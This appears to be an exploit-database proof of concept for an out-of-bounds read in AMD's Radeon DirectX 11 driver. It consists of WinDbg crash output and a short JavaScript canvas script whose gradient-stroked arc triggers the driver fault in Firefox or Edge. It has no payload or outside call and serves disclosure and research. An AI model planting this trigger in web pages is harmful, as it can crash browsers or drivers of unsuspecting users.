## https://sploitus.com/exploit?id=PACKETSTORM:157364
/*  
Title : Advanced Micro Devices, Inc. Radeon DirectX 11 Driver (Firefox/MS Edge) Memory Corruption  
Date : 10.04.2020   
Exploit Author : Marcin Ressel  
Vendor Homepage : https://www.amd.com/  
Software Link: n/a  
Version: 8.17.10.0871 (atidxx64.dll)  
Tested on: Windows 10 Home, AMD64 Family 23 Model 24 Stepping 1 AuthenticAMD ~2100 MHz,  
Firefox 74.0 (64-bit)  
MS Edge   
----  
0x24a5122ef60 (rbx) - 0x24a512270f0 (allocation UserAddr) = 0x7E70, and 0x7f10 (allocation UserSize) - 0x7E70 = 0xA0, so the faulting access at rbx+0xA0 lands exactly at the end of the allocation = OUT_OF_BOUNDS READ  
----  
0:123> g  
(2560.1f28): Access violation - code c0000005 (!!! second chance !!!)  
atidxx64!AmdDxGsaFreeCompiledShader+0x45901d:  
00007ffc`994cfecd 83bba000000013 cmp dword ptr [rbx+0A0h],13h ds:0000024a`5122f000=????????  
0:123> !heap -p -a @rbx  
24a512270f0  
address 0000024a5122ef60 found in   
_DPH_HEAP_ROOT @ 24a50701000  
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)  
24a653f10d0: 24a512270f0 7f10 - 24a51227000 9000  
00007ffca7204847 ntdll!RtlDebugAllocateHeap+0x000000000000003f  
00007ffca71b4a16 ntdll!RtlpAllocateHeap+0x0000000000077b26  
00007ffca713babb ntdll!RtlpAllocateHeapInternal+0x00000000000001cb  
00007ffc99378a05 atidxx64!AmdDxGsaFreeCompiledShader+0x0000000000301b55  
00007ffc996af263 atidxx64!AmdDxGsaFreeCompiledShader+0x00000000006383b3  
00007ffc996ae802 atidxx64!AmdDxGsaFreeCompiledShader+0x0000000000637952  
00007ffc993e9891 atidxx64!AmdDxGsaFreeCompiledShader+0x00000000003729e1  
00007ffc9917a7db atidxx64!AmdDxGsaFreeCompiledShader+0x000000000010392b  
00007ffc9917949b atidxx64!AmdDxGsaFreeCompiledShader+0x00000000001025eb  
00007ffc99169680 atidxx64!AmdDxGsaFreeCompiledShader+0x00000000000f27d0  
00007ffc99148e8a atidxx64!AmdDxGsaFreeCompiledShader+0x00000000000d1fda  
00007ffc990951f4 atidxx64!AmdDxGsaFreeCompiledShader+0x000000000001e344  
00007ffc998509ce atidxx64!AmdDxGsaFreeCompiledShader+0x00000000007d9b1e  
00007ffc9984b950 atidxx64!AmdDxGsaFreeCompiledShader+0x00000000007d4aa0  
00007ffc99826a26 atidxx64!AmdDxGsaFreeCompiledShader+0x00000000007afb76  
00007ffc990aedcb atidxx64!AmdDxGsaFreeCompiledShader+0x0000000000037f1b  
00007ffc990ae6a9 atidxx64!AmdDxGsaFreeCompiledShader+0x00000000000377f9  
00007ffc99952114 atidxx64!AmdLiquidVrD3D11WrapDeviceContext+0x00000000000a4654  
00007ffca6747bd4 KERNEL32!BaseThreadInitThunk+0x0000000000000014  
00007ffca716ced1 ntdll!RtlUserThreadStart+0x0000000000000021  
  
  
0:123> kb  
# RetAddr : Args to Child : Call Site  
00 00007ffc`994b4f3e : 0000024a`5122db98 0000024a`50dcef01 0000024a`5c27b600 0000024a`51228650 : atidxx64!AmdDxGsaFreeCompiledShader+0x45901d  
01 00007ffc`99166094 : 0000024a`00000000 0000024a`00000000 0000024a`51211fc0 00000056`0743ec89 : atidxx64!AmdDxGsaFreeCompiledShader+0x43e08e  
02 00007ffc`9917a1d3 : 0000024a`5122db80 0000024a`51211fc0 0000024a`0000002d 0000024a`51211fc0 : atidxx64!AmdDxGsaFreeCompiledShader+0xef1e4  
03 00007ffc`99169680 : 0000024a`60901a50 0000024a`50e63108 00000000`00000002 0000024a`60901a50 : atidxx64!AmdDxGsaFreeCompiledShader+0x103323  
04 00007ffc`99148e8a : 0000024a`60901a50 0000024a`50ddb1f0 0000024a`50dd6400 0000024a`60901a50 : atidxx64!AmdDxGsaFreeCompiledShader+0xf27d0  
05 00007ffc`990951f4 : 00000000`00000001 0000024a`50dd6400 0000024a`50ddb1f0 0000024a`50ae0ec0 : atidxx64!AmdDxGsaFreeCompiledShader+0xd1fda  
06 00007ffc`998509ce : 00000000`00000000 00000056`0743f5a0 0000024a`50dd6400 0000024a`5085c4c0 : atidxx64!AmdDxGsaFreeCompiledShader+0x1e344  
07 00007ffc`9984b950 : 0000024a`00000000 0000024a`507d7d08 00000000`00000000 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x7d9b1e  
08 00007ffc`99826a26 : 00000000`00000000 00000000`00000000 0000024a`50cfafe0 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x7d4aa0  
09 00007ffc`990aedcb : 0000024a`50cfafe0 00000000`00000000 0000024a`5dc8ffd0 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x7afb76  
0a 00007ffc`990ae6a9 : 00000000`00000000 0000024a`57423fd0 00000000`00000000 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x37f1b  
0b 00007ffc`99952114 : 0000024a`57423fd0 00000000`00000000 00000000`00000000 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x377f9  
0c 00007ffc`a6747bd4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : atidxx64!AmdLiquidVrD3D11WrapDeviceContext+0xa4654  
0d 00007ffc`a716ced1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14  
0e 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21  
*/  
  
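// Reproducer for the atidxx64.dll access violation documented in the header
// comment. The script itself only uses the standard canvas 2D API; the crash
// stack in the header is entirely inside the driver, with no script frames.
const canvas = document.createElement("canvas");
document.body.appendChild(canvas);
// 2D drawing context shared by the gradient builder and the stroke calls below.
const context = canvas.getContext("2d");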
  
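/**
 * Builds the radial gradient that is later used as the stroke style.
 *
 * The gradient's outer circle (centre (1, 0.6898449305444956), radius 1) is
 * the same circle the arc below is drawn on; the inner circle is centred at
 * (1, 1) with radius 0. A single colour stop is added at offset 0.
 *
 * @returns {CanvasGradient} the configured gradient
 */
function radioActiveGradient() {
  const gradient = context.createRadialGradient(1, 1, 0, 1, 0.6898449305444956, 1);
  gradient.addColorStop(0, "rgb(1,1,1)");
  return gradient;
}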
  
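// Draw an arc (0 to 1 radian) on the circle centred at (1, 0.6898449305444956)
// with radius 1 — the same circle as the gradient's outer circle — and stroke
// it with that gradient. The header comment's crash stack (atidxx64.dll) is
// presumably reached while this stroke is processed by the driver; the stack
// itself shows only driver and thread-start frames, so this is inferred.
context.arc(1, 0.6898449305444956, 1, 0, 1);
context.strokeStyle = radioActiveGradient();
context.stroke();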